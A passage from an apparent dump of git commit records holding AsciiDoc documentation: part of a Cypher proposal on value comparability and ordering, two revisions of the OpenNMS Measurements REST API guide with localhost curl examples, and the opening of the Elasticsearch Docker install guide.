Also, comparability and orderability are not aligned with each other consistently.\n\nWe propose that comparability be defined between any pair of values, where the result of a comparison is `null`, unless otherwise specified.\n\n- Integers are compared according to their natural ordering.\n- Floats (excluding `NaN`s) are compared according to their natural ordering. Infinities are the highest\/lowest values respectively.\n- Integers and floats are compared to each other according to their natural ordering.\n- Comparing any number to a `NaN` always yields `NaN`.\n- Booleans are compared such that `false < true`.\n- Strings are compared in dictionary order, i.e. characters are compared pairwise in order and characters missing in a shorter string are considered to be smaller than any other character. For example, `'a' < 'aa'`.\n- Lists are compared in dictionary order, i.e. list elements are compared pairwise in order and elements missing in a shorter list are considered to be smaller than any other value. For example, `[1] < [1,0]`.\n- Maps are compared as if they were lists of lists, where the inner lists are the key-value pairs of the maps, ordered in ascending sort order for the keys and omitting map entries where the value is `null`. Comparing a map to a value that is not a map always yields `null`.\n- The comparison order for nodes (and relationships resp.) is undefined, and an implementation may choose an order for these freely, e.g. by using some kind of id. This order must not change during the execution of the query (i.e. it must be stable in the presence of updates). Comparing a node to a relationship always yields `null`.\n- Paths are compared as if they were a list of alternating nodes and relationships of the path from the start node to the end node. Comparing a path to a value that is not a path always yields `null`.\n- Comparing any other combination of values of different types would yield `null` (meaning \"unknown\" in the context of comparability).\n\nWe further propose that orderability be defined between any pair of values, where the result is always `true` or `false`; i.e. always defined.\nTo accomplish this, there must be a pre-determined type order and each value must fall under exactly one type in this order. We propose to use the following ascending global sort order:\n\n- `NODE`\n- `RELATIONSHIP`\n- `PATH`\n- `MAP`\n- `LIST OF ANY?`\n- `STRING`\n- `BOOLEAN`\n- `NUMBER` (`NaN` is treated as the largest number in orderability, i.e. it is put after positive infinity)\n- `VOID` (i.e. `null`)\n\nWithin the types, orderability defers to comparability.\n\nThe accompanying descending global sort order is the same order in reverse (i.e. it runs from `VOID` to `NODE`).\n\nFinally, we propose to redefine how equality works for lists in Cypher today.\nThe main issue is how Cypher deals with lists that contain the `null` value.\nTo determine if two lists `l1` and `l2` are equal, we propose two simple tests, like so:\n\n- `l1` and `l2` must have the same size, i.e. inversely `size(l1) <> size(l2) => l1 <> l2`\n- the pairwise elements of both `l1` and `l2` must be equal, i.e.\n----\n[a1, a2, ...] 
= [b1, b2, ...]\n<=>\na1 = b1 && a2 = b2 && ...\n----\n\n=== Examples\n\nAn integer compared to a float\n[source, cypher]\n----\nRETURN 1 > 0.5 \/\/ should be true\n----\n\nA string compared to a boolean\n[source, cypher]\n----\nRETURN 'string' <= true \/\/ should be null\n----\n\nOrdering values of different types\n[source, cypher]\n----\nUNWIND [1, true, '', 3.14, {}, [2]] AS i\nRETURN i\n ORDER BY i \/\/ should not crash\n----\n\nFiltering distinct values of different types\n[source, cypher]\n----\nUNWIND [[null], [null]] AS i\nRETURN DISTINCT i \/\/ should return exactly one row\n----\n\n=== Interaction with existing features\n\nThe concept of orderability is used only by `ORDER BY` in Cypher today.\nThe concept of comparability is used by the comparison operators `<`, `>`, `<=`, `>=`.\n\nOne major goal of our proposal is for equality semantics to align well with comparability.\nThe concept of equality is used by the equality operator `=`, the inequality operator `<>`, value joins, and the `IN` operator.\nThe concept of equivalence is used by the `DISTINCT` clause modifier and in grouping.\n\nWith the proposals made in this CIP, specifically changing equality for lists, the mentioned functionality is going to treat lists containing `null` as unequal, thus potentially filtering out more rows when used in a predicate.\n\n=== Alternatives\n\nThis proposal could be extended with an operator for making equivalence accessible beyond use in grouping and `DISTINCT`.\n\n== Benefits to this proposal\n\nA consistent set of rules for equality, equivalence, comparability and orderability.\n\n== Caveats to this proposal\n\nAdopting this proposal may break some queries; specifically queries that depend on equality semantics of lists containing nulls.\nIt should be noted that we expect that most lists used in queries are constructed using `collect()`, which never outputs nulls.\n\n=== Appendix: Comparability by Type\n\nThe following table captures which types may be compared with each other such that the outcome is either `true` or `false`.\nAny other comparison will always yield `null` (except for `NaN`, which is handled as described above).\n\n.Comparability by type\n[frame=\"topbot\",options=\"header,footer\"]\n|===========================================================================================================================================\n|Type | `NODE` | `RELATIONSHIP` | `PATH` | `MAP` | `LIST OF ANY?` | `STRING` | `BOOLEAN` | `NUMBER` | `INTEGER` | `FLOAT` | `VOID`\n|`NODE` | X | | | | | | | | | |\n|`RELATIONSHIP` | | X | | | | | | | | |\n|`PATH` | | | X | | | | | | | |\n|`MAP` | | | | X | | | | | | |\n|`LIST OF ANY?` | | | | | X | | | | | |\n|`STRING` | | | | | | X | | | | |\n|`BOOLEAN` | | | | | | | X | | | |\n|`NUMBER` | | | | | | | | X | X | X |\n|`INTEGER` | | | | | | | | X | X | X |\n|`FLOAT` | | | | | | | | X | X | X |\n|`VOID` | | | | | | | | | | |\n|===========================================================================================================================================\n","old_contents":"= CIP2016-06-14 - Comparability and Orderability\n:numbered:\n:toc:\n:toc-placement: macro\n:source-highlighter: codemirror\n\n*Author:* Mats Rydberg <mats@neotechnology.com>, Stefan Plantikow <stefan.plantikow@neotechnology.com>\n\n[abstract]\n.Abstract\n--\nThis CIP intends to introduce and formalise two new concepts, Orderability and Comparability, and defines their relationship to the already existing concepts of equality and equivalence.\nOrderability revolves around 
the `ORDER BY` clause, and defines the semantics it needs to be able to properly sort values passed to it.\nComparability revolves around the inequality operators (`>`, `<`, `>=`, `<=`), and defines the semantics they need to properly determine how two values compare to each other.\nIn order to get a consistent set of rules, we are also proposing some changes to how Cypher deals with equality.\n--\n\ntoc::[]\n\n\n== Motivation\n\nThere are currently a number of limitations and inconsistencies that this CIP will try to fix.\n\n- `ORDER BY` will fail with an error if the values passed to it have different types.\n- Various inconsistencies around equality semantics as exposed by `IN`, `=`, `DISTINCT`, and grouping\n- Unclear relationship between comparison operators, equality, and `ORDER BY`\n\nThe difference between equality and equivalence in Cypher today is small and subtle, and limited to testing two instances of the value `null` to each other.\n\n- In equality, `null = null` is `null`\n- In equivalence, used by grouping and `DISTINCT`, instances of `null` are seen as the same\n\nThis proposal aims to increase the difference between these two concepts, by making lists containing nulls follow the same difference as the null values themselves.\n\n== Proposal\n\nCurrently, Cypher has good semantics for equality within the primitive types (booleans, strings, integers, and floats) and maps.\nFurthermore, Cypher has good semantics for comparability and orderability for integers, floats, and strings, within the types.\nBetween different types, however, the comparability is undefined, which is something we regard as a problem for certain combinations of values and types.\n\nWe propose that comparability be defined between any pair of values, where the result of a comparison is `null`, unless otherwise specified.\n\n- Integers are compared according to their natural ordering.\n- Floats (excluding `NaN`s) are compared according to their natural ordering. Infinities are the highest\/lowest values respectively.\n- Integers and floats are compared to each other according to their natural ordering.\n- Strings are compared in dictionary order.\n- Lists are compared in dictionary order. List elements are compared pairwise in order.\n- Booleans, maps, nodes, relationships, and paths are incomparable both within types and between types.\n- Any other combination of values of different types would yield `null`.\n\nWe further propose that orderability be defined between any pair of values, where the result is always `true` or `false`; ie always defined.\nTo accomplish this, there must be a pre-determined type order, and we propose the following order, ascending:\n\n- null\n- paths\n- relationships\n- nodes\n- maps\n- lists\n- strings\n- booleans\n- numbers\n- `NaN`\n\nWithin the types, orderability defers to comparability for the types were comparability is defined (numbers, strings, lists).\n- The order for nodes and relationships is undefined, and an implementation may choose a global sort order for these freely.\n- The order for paths is that of a list of nodes and relationships.\n- The order for maps is that of a list of lists, where the inner lists are the key-value pair of the maps, ordered in ascending sort order for the keys.\n\n\nFinally, we propose to redefine how equality works for lists in Cypher today.\nThe main issue is how Cypher deals with lists that contain the `null` value.\nWe propose a simple rule, like so\n----\n[a1, a2, ...] 
= [b1, b2, ...]\n<=>\na1 = b1 && a2 = b2 && ...\n----\n\n=== Examples\n\nAn integer compared to a float\n[source, cypher]\n----\nRETURN 1 > 0.5 \/\/ should be true\n----\n\nA string compared to a boolean\n[source, cypher]\n----\nRETURN 'string' <= true \/\/ should be null\n----\n\nOrdering values of different types\n[source, cypher]\n----\nUNWIND [1, true, '', 3.14, {}, [2]] AS i\nRETURN i\n ORDER BY i \/\/ should not crash\n----\n\nFiltering distinct values of different types\n[source, cypher]\n----\nUNWIND [[null], [null]] AS i\nRETURN DISTINCT i \/\/ should return two rows\n----\n\n=== Semantics\n\n\/\/Provide a description of the expected semantics of the new feature(s).\n\/\/Use subheadings to structure the content.\n\/\/\n\/\/_Examples are shown below in sections 3.3.1\u20133.3.3:_\n\n=== Interaction with existing features\n\nThe concept of orderability is used only by `ORDER BY` in Cypher today.\nThe concept of comparability is used by the comparisons operators `<`, `>`, `<=`, >=`.\n\nOne major goal of our proposal is for equality semantics to align well with comparability.\nThe concept of equality is used by the equality operator `=`, the inequality operator `<>`, `DISTINCT`, value joins, and grouping.\nWith the proposals made in this CIP, specifically changing equality for lists, the mentioned functionality is going to treat lists containing `null` as unequal, thus producing more rows (in general).\n\n=== Alternatives\n\nThis proposal could be extended to define comparability for maps, booleans, and graph types.\n\nThis proposal could be extended with a new way to express current grouping semantics (structural equivalence).\n\n- DISTINCT ~ foo, ~ bar\n- lhs ~ rhs\n- ~ expr IN list\n\n== What others do\n\nIf applicable, include a feature comparison table, along with any useful links.\n\nTo provide a well-rounded comparison, please ensure the inclusion of at least one SQL-based implementation -- such as DB2 or Postgres -- as well as SPARQL.\nIf you require any assistance or pointers to the latter, please contact petra.selmer@neotechnology.com.\n\n== Benefits to this proposal\n\nA consistent set of rules for equality, comparability and orderability.\n\n== Caveats to this proposal\n\nAdopting this proposal may break some queries; specifically queries that depend on equality semantics of lists containing nulls.\nIt should be noted that we expect that most lists used in queries are constructed using `collect()`, which never outputs nulls.\n\n== Appendix\n\nPut any supplementary information here.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9a74f80c80382d06a39f25bc940721a254e80585","subject":"Measurement ReST API: better explanation of the \"start\" option","message":"Measurement ReST API: better explanation of the \"start\" option","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-development\/src\/asciidoc\/text\/rest\/measurements.adoc","new_file":"opennms-doc\/guide-development\/src\/asciidoc\/text\/rest\/measurements.adoc","new_contents":"==== Measurements API\n\nThe _Measurements API_ can be used to retrieve collected values stored in _RRD_ (or _JRB_) files.\nNote that all units of time are expressed in milliseconds.\n\n===== GETs (Reading Data)\n\n[options=\"header\", cols=\"5,10\"]\n|===\n| Resource | Description\n| `\/measurements\/{resourceId}\/{attribute}` | Retrieve the measurements for a single 
attribute\n|===\n\nThe following table shows all supported query string parameters and their default values.\n\n[options=\"header\"]\n|===\n| name | default | comment\n| start | -14400000 | Timestamp in milliseconds.\n\n If > 0, the timestamp is relative to the UNIX epoch (January 1st, 1970, 00:00:00 UTC).\n \n If < 0, the timestamp is relative to the `end` option (i.e.: default value is 4 hours ago).\n| end | 0 | Timestamp in milliseconds. If \\<= 0, the effective value will be the current timestamp.\n| step | 300000 | Requested time interval between rows. Actual step may differ. Set to 1 for maximum accuracy.\n| maxrows | 0 | When using the measurements to render a graph, this should be set to the graph's pixel width.\n| interval | null | Duration in milliseconds, used by strategies that implement late aggregation.\n| heartbeat | null | Duration in milliseconds, used by strategies that implement late aggregation.\n| aggregation | AVERAGE | Consolidation function used. Can typically be `AVERAGE`, `MIN` or `MAX`. Depends on `RRA` definitions.\n| fallback-attribute | | Secondary attribute that will be queried in the case that the primary attribute does not exist.\n|===\n\n===== Usage examples with curl\n\n.Retrieve CPU counter metrics over the last 2 hours for node 1\n[source,bash]\n----\ncurl -u admin:admin \"http:\/\/127.0.0.1:8980\/opennms\/rest\/measurements\/node%5B1%5D.nodeSnmp%5B%5D\/CpuRawUser?start=-7200000&maxrows=30&aggregation=AVERAGE\"\n----\n\n.Response\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n<query-response end=\"1425588138256\" start=\"1425580938256\" step=\"300000\">\n <columns>\n <values>159.5957271523179<\/values>\n <values>158.08531037527592<\/values>\n <values>158.45835584842285<\/values>\n ...\n <\/columns>\n <labels>CpuRawUser<\/labels>\n <timestamps>1425581100000<\/timestamps>\n <timestamps>1425581400000<\/timestamps>\n <timestamps>1425581700000<\/timestamps>\n ...\n<\/query-response>\n----\n\n===== POSTs (Reading Data)\n\n[options=\"header\", cols=\"5,10\"]\n|===\n| Resource | Description\n| `\/measurements` | Retrieve the measurements for one or more attributes, possibly spanning multiple resources, with support for JEXL expressions.\n|===\n\nHere we use a POST instead of a GET to retrieve the measurements, which allows us to perform complex queries which are difficult to express in a query string.\nThese requests cannot be used to update or create new metrics.\n\nAn example of the POST body is available below.\n\n===== Usage examples with curl\n\n.Retrieve bits in and bits out metrics for a particular interface. 
Perform calculations on bits out, and only return the derived values.\n[source,bash]\n----\ncurl -X POST -H \"Accept: application\/json\" -H \"Content-Type: application\/json\" -u admin:admin -d @report.json http:\/\/127.0.0.1:8980\/opennms\/rest\/measurements\n----\n\n.Contents of report.json\n[source,javascript]\n----\n{\n \"start\": 1425563626316,\n \"end\": 1425585226316,\n \"step\": 10000,\n \"maxrows\": 1600,\n \"source\": [\n {\n \"aggregation\": \"AVERAGE\",\n \"attribute\": \"ifHCInOctets\",\n \"label\": \"ifHCInOctets\",\n \"resourceId\": \"nodeSource[Servers:1424038123222].interfaceSnmp[eth0-04013f75f101]\",\n \"transient\": \"false\"\n },\n {\n \"aggregation\": \"AVERAGE\",\n \"attribute\": \"ifHCOutOctets\",\n \"label\": \"ifHCOutOctets\",\n \"resourceId\": \"nodeSource[Servers:1424038123222].interfaceSnmp[eth0-04013f75f101]\",\n \"transient\": \"true\"\n }\n ],\n \"expression\": [\n {\n \"label\": \"ifHCOutOctetsNeg\",\n \"value\": \"-1.0 * ifHCOutOctets\",\n \"transient\": \"false\"\n }\n ]\n}\n----\n\n.Response\n[source,javascript]\n----\n{\n \"step\": 300000,\n \"start\": 1425563626316,\n \"end\": 1425585226316,\n \"timestamps\": [\n 1425563700000,\n 1425564000000,\n 1425564300000,\n ...\n ],\n \"labels\": [\n \"ifHCInOctets\",\n \"ifHCOutOctetsNeg\"\n ],\n \"columns\": [\n {\n \"values\": [\n 139.94817275747508,\n 199.0062569213732,\n 162.6264894795127,\n ...\n ]\n },\n {\n \"values\": [\n -151.66179401993355,\n -214.7415503875969,\n -184.9012624584718,\n ...\n ]\n }\n ]\n}\n----\n","old_contents":"==== Measurements API\n\nThe _Measurements API_ can be used to retrieve collected values stored in _RRD_ (or _JRB_) files.\nNote that all units of time are expressed in milliseconds.\n\n===== GETs (Reading Data)\n\n[options=\"header\", cols=\"5,10\"]\n|===\n| Resource | Description\n| `\/measurements\/{resourceId}\/{attribute}` | Retrieve the measurements for a single attribute\n|===\n\nThe following table shows all supported query string parameters and their default values.\n\n[options=\"header\"]\n|===\n| name | default | comment\n| start | -14400000 | Timestamp in milliseconds. If < 0, the effective value will be `end - start`\n (i.e.: default value is 4 hours ago).\n| end | 0 | Timestamp in milliseconds. If \\<= 0, the effective value will be the current timestamp.\n| step | 300000 | Requested time interval between rows. Actual step may differ. Set to 1 for maximum accuracy.\n| maxrows | 0 | When using the measurements to render a graph, this should be set to the graph's pixel width.\n| interval | null | Duration in milliseconds, used by strategies that implement late aggregation.\n| heartbeat | null | Duration in milliseconds, used by strategies that implement late aggregation.\n| aggregation | AVERAGE | Consolidation function used. Can typically be `AVERAGE`, `MIN` or `MAX`. 
Depends on `RRA` definitions.\n| fallback-attribute | | Secondary attribute that will be queried in the case the primary attribute does not exist.\n|===\n\n===== Usage examples with curl\n\n.Retrieve CPU counter metrics over the last 2 hours for node 1\n[source,bash]\n----\ncurl -u admin:admin \"http:\/\/127.0.0.1:8980\/opennms\/rest\/measurements\/node%5B1%5D.nodeSnmp%5B%5D\/CpuRawUser?start=-7200000&maxrows=30&aggregation=AVERAGE\"\n----\n\n.Response\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n<query-response end=\"1425588138256\" start=\"1425580938256\" step=\"300000\">\n <columns>\n <values>159.5957271523179<\/values>\n <values>158.08531037527592<\/values>\n <values>158.45835584842285<\/values>\n ...\n <\/columns>\n <labels>CpuRawUser<\/labels>\n <timestamps>1425581100000<\/timestamps>\n <timestamps>1425581400000<\/timestamps>\n <timestamps>1425581700000<\/timestamps>\n ...\n<\/query-response>\n----\n\n===== POSTs (Reading Data)\n\n[options=\"header\", cols=\"5,10\"]\n|===\n| Resource | Description\n| `\/measurements` | Retrieve the measurements for one or more attributes, possibly spanning multiple resources, with support for JEXL expressions.\n|===\n\nHere we use a POST instead of a GET to retrieve the measurements, which allows us to perform complex queries which are difficult to express in a query string.\nThese requests cannot be used to update or create new metrics.\n\nAn example of the POST body is available bellow.\n\n===== Usage examples with curl\n\n.Retrieve bits in and bits out metrics for a particular interface. Perform calculations on bits out, and only return the derived values.\n[source,bash]\n----\ncurl -X POST -H \"Accept: application\/json\" -H \"Content-Type: application\/json\" -u admin:admin -d @report.json http:\/\/127.0.0.1:8980\/opennms\/rest\/measurements\n----\n\n.Contents of report.json\n[source,javascript]\n----\n{\n \"start\": 1425563626316,\n \"end\": 1425585226316,\n \"step\": 10000,\n \"maxrows\": 1600,\n \"source\": [\n {\n \"aggregation\": \"AVERAGE\",\n \"attribute\": \"ifHCInOctets\",\n \"label\": \"ifHCInOctets\",\n \"resourceId\": \"nodeSource[Servers:1424038123222].interfaceSnmp[eth0-04013f75f101]\",\n \"transient\": \"false\"\n },\n {\n \"aggregation\": \"AVERAGE\",\n \"attribute\": \"ifHCOutOctets\",\n \"label\": \"ifHCOutOctets\",\n \"resourceId\": \"nodeSource[Servers:1424038123222].interfaceSnmp[eth0-04013f75f101]\",\n \"transient\": \"true\"\n }\n ],\n \"expression\": [\n {\n \"label\": \"ifHCOutOctetsNeg\",\n \"value\": \"-1.0 * ifHCOutOctets\",\n \"transient\": \"false\"\n }\n ]\n}\n----\n\n.Response\n[source,javascript]\n----\n{\n \"step\": 300000,\n \"start\": 1425563626316,\n \"end\": 1425585226316,\n \"timestamps\": [\n 1425563700000,\n 1425564000000,\n 1425564300000,\n ...\n ],\n \"labels\": [\n \"ifHCInOctets\",\n \"ifHCOutOctetsNeg\"\n ],\n \"columns\": [\n {\n \"values\": [\n 139.94817275747508,\n 199.0062569213732,\n 162.6264894795127,\n ...\n ]\n },\n {\n \"values\": [\n -151.66179401993355,\n -214.7415503875969,\n -184.9012624584718,\n ...\n ]\n }\n ]\n}\n----\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"5170390b8fcaaccd421b52f861c2e3dd283b2b62","subject":"Measurement ReST API: better explanation of the \"start\" option","message":"Measurement ReST API: better explanation of the \"start\" 
option","repos":"aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-development\/src\/asciidoc\/text\/rest\/measurements.adoc","new_file":"opennms-doc\/guide-development\/src\/asciidoc\/text\/rest\/measurements.adoc","new_contents":"==== Measurements API\n\nThe _Measurements API_ can be used to retrieve collected values stored in _RRD_ (or _JRB_) files.\nNote that all units of time are expressed in milliseconds.\n\n===== GETs (Reading Data)\n\n[options=\"header\", cols=\"5,10\"]\n|===\n| Resource | Description\n| `\/measurements\/{resourceId}\/{attribute}` | Retrieve the measurements for a single attribute\n|===\n\nThe following table shows all supported query string parameters and their default values.\n\n[options=\"header\"]\n|===\n| name | default | comment\n| start | -14400000 | Timestamp in milliseconds.\n\n If > 0, the timestamp is relative to the UNIX epoch (January 1st 1970 00:00:00 AM).\n \n If < 0, the timestamp is relative to the `end` option (i.e.: default value is 4 hours ago).\n| end | 0 | Timestamp in milliseconds. If \\<= 0, the effective value will be the current timestamp.\n| step | 300000 | Requested time interval between rows. Actual step may differ. Set to 1 for maximum accuracy.\n| maxrows | 0 | When using the measurements to render a graph, this should be set to the graph's pixel width.\n| interval | null | Duration in milliseconds, used by strategies that implement late aggregation.\n| heartbeat | null | Duration in milliseconds, used by strategies that implement late aggregation.\n| aggregation | AVERAGE | Consolidation function used. Can typically be `AVERAGE`, `MIN` or `MAX`. Depends on `RRA` definitions.\n| fallback-attribute | | Secondary attribute that will be queried in the case the primary attribute does not exist.\n|===\n\n===== Usage examples with curl\n\n.Retrieve CPU counter metrics over the last 2 hours for node 1\n[source,bash]\n----\ncurl -u admin:admin \"http:\/\/127.0.0.1:8980\/opennms\/rest\/measurements\/node%5B1%5D.nodeSnmp%5B%5D\/CpuRawUser?start=-7200000&maxrows=30&aggregation=AVERAGE\"\n----\n\n.Response\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n<query-response end=\"1425588138256\" start=\"1425580938256\" step=\"300000\">\n <columns>\n <values>159.5957271523179<\/values>\n <values>158.08531037527592<\/values>\n <values>158.45835584842285<\/values>\n ...\n <\/columns>\n <labels>CpuRawUser<\/labels>\n <timestamps>1425581100000<\/timestamps>\n <timestamps>1425581400000<\/timestamps>\n <timestamps>1425581700000<\/timestamps>\n ...\n<\/query-response>\n----\n\n===== POSTs (Reading Data)\n\n[options=\"header\", cols=\"5,10\"]\n|===\n| Resource | Description\n| `\/measurements` | Retrieve the measurements for one or more attributes, possibly spanning multiple resources, with support for JEXL expressions.\n|===\n\nHere we use a POST instead of a GET to retrieve the measurements, which allows us to perform complex queries which are difficult to express in a query string.\nThese requests cannot be used to update or create new metrics.\n\nAn example of the POST body is available bellow.\n\n===== Usage examples with curl\n\n.Retrieve bits in and bits out metrics for a particular interface. 
Perform calculations on bits out, and only return the derived values.\n[source,bash]\n----\ncurl -X POST -H \"Accept: application\/json\" -H \"Content-Type: application\/json\" -u admin:admin -d @report.json http:\/\/127.0.0.1:8980\/opennms\/rest\/measurements\n----\n\n.Contents of report.json\n[source,javascript]\n----\n{\n \"start\": 1425563626316,\n \"end\": 1425585226316,\n \"step\": 10000,\n \"maxrows\": 1600,\n \"source\": [\n {\n \"aggregation\": \"AVERAGE\",\n \"attribute\": \"ifHCInOctets\",\n \"label\": \"ifHCInOctets\",\n \"resourceId\": \"nodeSource[NODES:1424038123222].interfaceSnmp[eth0-04013f75f101]\",\n \"transient\": \"false\"\n },\n {\n \"aggregation\": \"AVERAGE\",\n \"attribute\": \"ifHCOutOctets\",\n \"label\": \"ifHCOutOctets\",\n \"resourceId\": \"nodeSource[NODES:1424038123222].interfaceSnmp[eth0-04013f75f101]\",\n \"transient\": \"true\"\n }\n ],\n \"expression\": [\n {\n \"label\": \"ifHCOutOctetsNeg\",\n \"value\": \"-1.0 * ifHCOutOctets\",\n \"transient\": \"false\"\n }\n ]\n}\n----\n\n.Response\n[source,javascript]\n----\n{\n \"step\": 300000,\n \"start\": 1425563626316,\n \"end\": 1425585226316,\n \"timestamps\": [\n 1425563700000,\n 1425564000000,\n 1425564300000,\n ...\n ],\n \"labels\": [\n \"ifHCInOctets\",\n \"ifHCOutOctetsNeg\"\n ],\n \"columns\": [\n {\n \"values\": [\n 139.94817275747508,\n 199.0062569213732,\n 162.6264894795127,\n ...\n ]\n },\n {\n \"values\": [\n -151.66179401993355,\n -214.7415503875969,\n -184.9012624584718,\n ...\n ]\n }\n ]\n}\n----\n","old_contents":"==== Measurements API\n\nThe _Measurements API_ can be used to retrieve collected values stored in _RRD_ (or _JRB_) files.\nNote that all units of time are expressed in milliseconds.\n\n===== GETs (Reading Data)\n\n[options=\"header\", cols=\"5,10\"]\n|===\n| Resource | Description\n| `\/measurements\/{resourceId}\/{attribute}` | Retrieve the measurements for a single attribute\n|===\n\nThe following table shows all supported query string parameters and their default values.\n\n[options=\"header\"]\n|===\n| name | default | comment\n| start | -14400000 | Timestamp in milliseconds. If < 0, the effective value will be `end - start`\n (i.e.: default value is 4 hours ago).\n| end | 0 | Timestamp in milliseconds. If \\<= 0, the effective value will be the current timestamp.\n| step | 300000 | Requested time interval between rows. Actual step may differ. Set to 1 for maximum accuracy.\n| maxrows | 0 | When using the measurements to render a graph, this should be set to the graph's pixel width.\n| interval | null | Duration in milliseconds, used by strategies that implement late aggregation.\n| heartbeat | null | Duration in milliseconds, used by strategies that implement late aggregation.\n| aggregation | AVERAGE | Consolidation function used. Can typically be `AVERAGE`, `MIN` or `MAX`. 
Depends on `RRA` definitions.\n| fallback-attribute | | Secondary attribute that will be queried in the case the primary attribute does not exist.\n|===\n\n===== Usage examples with curl\n\n.Retrieve CPU counter metrics over the last 2 hours for node 1\n[source,bash]\n----\ncurl -u admin:admin \"http:\/\/127.0.0.1:8980\/opennms\/rest\/measurements\/node%5B1%5D.nodeSnmp%5B%5D\/CpuRawUser?start=-7200000&maxrows=30&aggregation=AVERAGE\"\n----\n\n.Response\n[source,xml]\n----\n<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n<query-response end=\"1425588138256\" start=\"1425580938256\" step=\"300000\">\n <columns>\n <values>159.5957271523179<\/values>\n <values>158.08531037527592<\/values>\n <values>158.45835584842285<\/values>\n ...\n <\/columns>\n <labels>CpuRawUser<\/labels>\n <timestamps>1425581100000<\/timestamps>\n <timestamps>1425581400000<\/timestamps>\n <timestamps>1425581700000<\/timestamps>\n ...\n<\/query-response>\n----\n\n===== POSTs (Reading Data)\n\n[options=\"header\", cols=\"5,10\"]\n|===\n| Resource | Description\n| `\/measurements` | Retrieve the measurements for one or more attributes, possibly spanning multiple resources, with support for JEXL expressions.\n|===\n\nHere we use a POST instead of a GET to retrieve the measurements, which allows us to perform complex queries which are difficult to express in a query string.\nThese requests cannot be used to update or create new metrics.\n\nAn example of the POST body is available bellow.\n\n===== Usage examples with curl\n\n.Retrieve bits in and bits out metrics for a particular interface. Perform calculations on bits out, and only return the derived values.\n[source,bash]\n----\ncurl -X POST -H \"Accept: application\/json\" -H \"Content-Type: application\/json\" -u admin:admin -d @report.json http:\/\/127.0.0.1:8980\/opennms\/rest\/measurements\n----\n\n.Contents of report.json\n[source,javascript]\n----\n{\n \"start\": 1425563626316,\n \"end\": 1425585226316,\n \"step\": 10000,\n \"maxrows\": 1600,\n \"source\": [\n {\n \"aggregation\": \"AVERAGE\",\n \"attribute\": \"ifHCInOctets\",\n \"label\": \"ifHCInOctets\",\n \"resourceId\": \"nodeSource[NODES:1424038123222].interfaceSnmp[eth0-04013f75f101]\",\n \"transient\": \"false\"\n },\n {\n \"aggregation\": \"AVERAGE\",\n \"attribute\": \"ifHCOutOctets\",\n \"label\": \"ifHCOutOctets\",\n \"resourceId\": \"nodeSource[NODES:1424038123222].interfaceSnmp[eth0-04013f75f101]\",\n \"transient\": \"true\"\n }\n ],\n \"expression\": [\n {\n \"label\": \"ifHCOutOctetsNeg\",\n \"value\": \"-1.0 * ifHCOutOctets\",\n \"transient\": \"false\"\n }\n ]\n}\n----\n\n.Response\n[source,javascript]\n----\n{\n \"step\": 300000,\n \"start\": 1425563626316,\n \"end\": 1425585226316,\n \"timestamps\": [\n 1425563700000,\n 1425564000000,\n 1425564300000,\n ...\n ],\n \"labels\": [\n \"ifHCInOctets\",\n \"ifHCOutOctetsNeg\"\n ],\n \"columns\": [\n {\n \"values\": [\n 139.94817275747508,\n 199.0062569213732,\n 162.6264894795127,\n ...\n ]\n },\n {\n \"values\": [\n -151.66179401993355,\n -214.7415503875969,\n -184.9012624584718,\n ...\n ]\n }\n ]\n}\n----\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"a4ab7f9d03ee0446fa1be04e34677e7c521a6f15","subject":"[DOCS] Docker configs should set `network.host` to `0.0.0.0` (#80042)","message":"[DOCS] Docker configs should set `network.host` to `0.0.0.0` (#80042)\n\nThe `elasticsearch.yml` file that ships with our Docker image includes the\r\n`network.host: 0.0.0.0` setting by default. 
If a user bind-mounts a custom\r\nconfig file, it should include this setting to ensure Elasticsearch is reachable.\r\n\r\nCloses #77937.","repos":"GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch","old_file":"docs\/reference\/setup\/install\/docker.asciidoc","new_file":"docs\/reference\/setup\/install\/docker.asciidoc","new_contents":"[[docker]]\n=== Install {es} with Docker\n\n{es} is also available as Docker images. Starting with version 8.0.0, these\nare based upon a tiny core of essential files. Prior versions used\nhttps:\/\/hub.docker.com\/_\/centos\/[centos:8] as the base image.\n\nA list of all published Docker images and tags is available at\nhttps:\/\/www.docker.elastic.co[www.docker.elastic.co]. The source files\nare in\nhttps:\/\/github.com\/elastic\/elasticsearch\/blob\/{branch}\/distribution\/docker[GitHub].\n\ninclude::license.asciidoc[]\n\nStarting in {es} 8.0, security is enabled by default. With security enabled,\n{stack} {security-features} require TLS encryption for the transport networking\nlayer, or your cluster will fail to start.\n\n==== Install Docker Desktop or Docker Engine\n\nInstall the appropriate https:\/\/docs.docker.com\/get-docker\/[Docker application]\nfor your operating system.\n\nNOTE: Make sure that Docker is allotted at least 4GiB of memory. In Docker\nDesktop, you configure resource usage on the Advanced tab in Preferences (macOS)\nor Settings (Windows).\n\n==== Pull the {es} Docker image\n\nObtaining {es} for Docker is as simple as issuing a `docker pull` command\nagainst the Elastic Docker registry.\n\nifeval::[\"{release-state}\"==\"unreleased\"]\n\nWARNING: Version {version} of {es} has not yet been released, so no\nDocker image is currently available for this version.\n\nendif::[]\n\nifeval::[\"{release-state}\"!=\"unreleased\"]\n\n[source,sh,subs=\"attributes\"]\n----\ndocker pull {docker-repo}:{version}\n----\n\nendif::[]\n\nNow that you have the {es} Docker image, you can start a\n<<docker-cli-run-dev-mode,single-node>> or <<docker-compose-file,multi-node>>\ncluster.\n\n[[docker-cli-run-dev-mode]]\n==== Start a single-node cluster with 